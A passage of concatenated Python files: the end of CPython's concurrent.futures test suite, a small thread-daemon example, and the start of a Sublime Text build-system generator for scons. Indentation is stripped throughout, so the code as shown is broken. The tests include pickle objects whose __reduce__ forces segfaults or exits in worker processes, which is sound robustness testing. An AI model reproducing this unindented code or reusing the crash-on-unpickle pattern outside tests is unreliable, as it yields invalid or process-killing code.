from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertWarns(DeprecationWarning):
future = self.executor.submit(fn=capture, arg=1)
self.assertEqual(future.result(), ((), {'arg': 1}))
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
# Ensure that argument for a job are correctly gc-ed after the job
# is finished
obj = EventfulGCObj(self.ctx)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
# composants.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
# This should be safe to call executor.shutdown here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
# Test that the pool calling shutdown do not cause deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = test.support.threading_setup()
def tearDownModule():
test.support.threading_cleanup(*_threads_key)
multiprocessing.util._cleanup_tests()
if __name__ == "__main__":
unittest.main()
|
Chap10_Example10.16.py
|
from threading import Thread
def disp():
print('Display function')
threadobj = Thread(target = disp) # D0
print("Before setting thread as daemon: ", threadobj.isDaemon())# D1
threadobj.setDaemon(True)# D2
print("After setting thread as daemon: ", threadobj.isDaemon())# D3
|
sublime_text.py
|
import os
from devops_tools.system import SYSTEM
BUILD_SYSTEM="""
{
"working_dir": "${project_path}",
"target": "statiskit",
"file_regex": "^\\\\[Build error - file \\"(...*?)\\" at line ([0-9]*), (.*)\\\\]$",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig --diagnostics-color=never && scons --diagnostics-color=never --with-nose-debug=none'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig && scons --with-nose-debug=none'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} && scons autowig & scons --with-nose-debug=none",
"shell": true
},
"variants":
[
{
"name": "C++",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons cpp --diagnostics-color=never'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons cpp'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons cpp",
"shell": true
},
},
{
"name": "Python",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons py --diagnostics-color=never'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons py'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons py",
"shell": true
},
},
{
"name": "Test",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons test --diagnostics-color=never --with-nose-debug=none'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons test --with-nose-debug=none'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons test --with-nose-debug=none",
"shell": true
},
},
{
"name": "AutoWIG",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig --diagnostics-color=never'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons autowig",
"shell": true
},
},
{
"name": "Clean",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig -c; scons -c'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig -c; scons -c'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons autowig -c & scons -c",
"shell": true
},
}
]
}"""
BUILD_TARGET = """
import collections
import functools
import html
import os
import subprocess
import sys
import threading
import time
import sublime
import sublime_plugin
import re
class ProcessListener(object):
def on_data(self, proc, data):
pass
def on_finished(self, proc):
pass
class AsyncProcess(object):
\"\"\"
Encapsulates subprocess.Popen, forwarding stdout to a supplied
ProcessListener (on a separate thread)
\"\"\"
def __init__(self, cmd, shell_cmd, env, listener, path="", shell=False):
\"\"\" "path" and "shell" are options in build systems \"\"\"
if not shell_cmd and not cmd:
raise ValueError("shell_cmd or cmd is required")
if shell_cmd and not isinstance(shell_cmd, str):
raise ValueError("shell_cmd must be a string")
self.listener = listener
self.killed = False
self.start_time = time.time()
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO()
